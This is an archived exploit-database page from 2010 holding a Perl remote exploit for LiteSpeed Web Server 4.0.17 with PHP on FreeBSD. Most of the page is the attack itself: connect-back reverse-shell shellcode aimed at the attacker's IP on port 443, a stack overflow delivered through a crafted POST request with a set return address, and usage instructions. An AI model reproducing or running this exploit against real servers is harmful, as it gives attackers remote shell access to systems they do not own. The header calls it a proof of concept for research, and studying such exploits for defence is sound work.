Home / os / win7

[remote exploits] - LiteSpeed Web Server 4.0.17 w/ PHP Remot

Posted on 10 December 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>LiteSpeed Web Server 4.0.17 w/ PHP Remote Exploit | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='LiteSpeed Web Server 4.0.17 w/ PHP Remote Exploit by Kingcope in remote exploits | Inj3ct0r 1337 - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_setDomainName", "none"]);_gaq.push(["_setAllowLinker", true]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>=================================================
LiteSpeed Web Server 4.0.17 w/ PHP Remote Exploit
=================================================

# LiteSpeed Web Server 4.0.17 w/ PHP Remote Exploit for FreeBSD
# bug discovered &amp; exploited by Kingcope
#
# Dec 2010
# Lame Xploit Tested with success on
# FreeBSD 8.0-RELEASE - LiteSpeed WebServer 4.0.17 Standard &amp; Enterprise x86
# FreeBSD 6.3-RELEASE - LiteSpeed WebServer 4.0.17 Standard &amp; Enterprise x86
# FreeBSD 8.0-RELEASE - LiteSpeed WebServer 4.0.15 Standard x86
# can be used against the admin interface (port 7080), too
# Xploit only works on default lsphp binary not the compiled version
#
# this should be exploitable on linux too (on the compiled SAPI version)
# the shipped linux version of lsphp has stack cookies enabled,
# which could be brute forced if there wasn&#039;t a null put at the end of
# the exploit buffer. The compiled SAPI version is exploitable, but then
# the offsets differ from box to box, so this time FreeBSD targets only.
# thus on linux this is very tricky to exploit.
# this is a proof of concept, don&#039;t try this on real boxes
# see lsapilib.c line 1240
(http://litespeedtech.com/packages/lsapi/php-litespeed-5.4.tgz)
 
use IO::Socket;
 
$|=1;
 
#freebsd reverse shell port 443
#setup a netcat on this port ^^
$bsdcbsc =
        # setreuid, no root here
        &quot;x31xc0x31xc0x50x31xc0x50xb0x7ex50xcdx80&quot;.
        # connect back :&gt;
        &quot;x31xc0x31xdbx53xb3x06x53&quot;.
        &quot;xb3x01x53xb3x02x53x54xb0&quot;.
        &quot;x61xcdx80x31xd2x52x52x68&quot;.
        &quot;x41x41x41x41x66x68x01xbb&quot;.
        &quot;xb7x02x66x53x89xe1xb2x10&quot;.
        &quot;x52x51x50x52x89xc2x31xc0&quot;.
        &quot;xb0x62xcdx80x31xdbx39xc3&quot;.
        &quot;x74x06x31xc0xb0x01xcdx80&quot;.
        &quot;x31xc0x50x52x50xb0x5axcd&quot;.
        &quot;x80x31xc0x31xdbx43x53x52&quot;.
        &quot;x50xb0x5axcdx80x31xc0x43&quot;.
        &quot;x53x52x50xb0x5axcdx80x31&quot;.
        &quot;xc0x50x68x2fx2fx73x68x68&quot;.
        &quot;x2fx62x69x6ex89xe3x50x54&quot;.
        &quot;x53x50xb0x3bxcdx80x31xc0&quot;.
        &quot;xb0x01xcdx80&quot;;
 
sub usage() {
        print &quot;written by kingcope
&quot;;
        print &quot;usage:
&quot;.
                  &quot;litespeed-remote.pl &lt;target ip/host&gt; &lt;target port&gt;
&lt;your ip&gt; &lt;php file on remote host&gt;

&quot;.
                  &quot;example:
&quot;.
                  &quot;perl litespeed-remote.pl 192.168.2.3 8088
192.168.2.2 phpinfo.php

&quot;;
 
        exit;
}
 
if ($#ARGV ne 3) { usage; }
 
$target = $ARGV[0];
$port = $ARGV[1];
$cbip = $ARGV[2];
$file = $ARGV[3];
 
($a1, $a2, $a3, $a4) = split(//, gethostbyname(&quot;$cbip&quot;));
 
substr($bsdcbsc, 37, 4, $a1 . $a2 . $a3 . $a4);
 
#my $sock = IO::Socket::INET-&gt;new(PeerAddr =&gt; $target,
#                                 PeerPort =&gt; 8088,
#                                         Proto    =&gt; &#039;tcp&#039;);
#$a = &quot;A&quot; x 500;
#print $sock &quot;POST /phpinfo.php HTTP/1.1
Host: 192.168.2.5

&quot;;
 
#$x = &lt;stdin&gt;;
 
#$ret = pack(&quot;V&quot;, 0x28469478); # FreeBSD 7.3-RELEASE
#$ret = pack(&quot;V&quot;, 0x82703c0); # FreeBSD 6.3-RELEASE
$ret = pack(&quot;V&quot;, 0x080F40CD); # JMP EDX lsphp
 
my $sock = IO::Socket::INET-&gt;new(PeerAddr =&gt; $target,
                                  PeerPort =&gt; $port,
                                          Proto    =&gt; &#039;tcp&#039;);
 
 
$a = &quot;A&quot; x 263 . &quot;AAAA&quot; x 6 . $ret . &quot;C&quot; x 500;
$sc = &quot;x90&quot; x 3000 . $bsdcbsc;
 
print $sock &quot;POST /x90x90x90x90x90x90xebx50/../$file?
HTTP/1.1
Host: $target
VVVV: $sc
$a KINGCOPEH4XXU:

&quot;;
 
while (&lt;$sock&gt;) {
    print;
}


# <a href='http://1337db.com/'>1337db.com</a> [2010-12-10]</pre></body></html>

 

TOP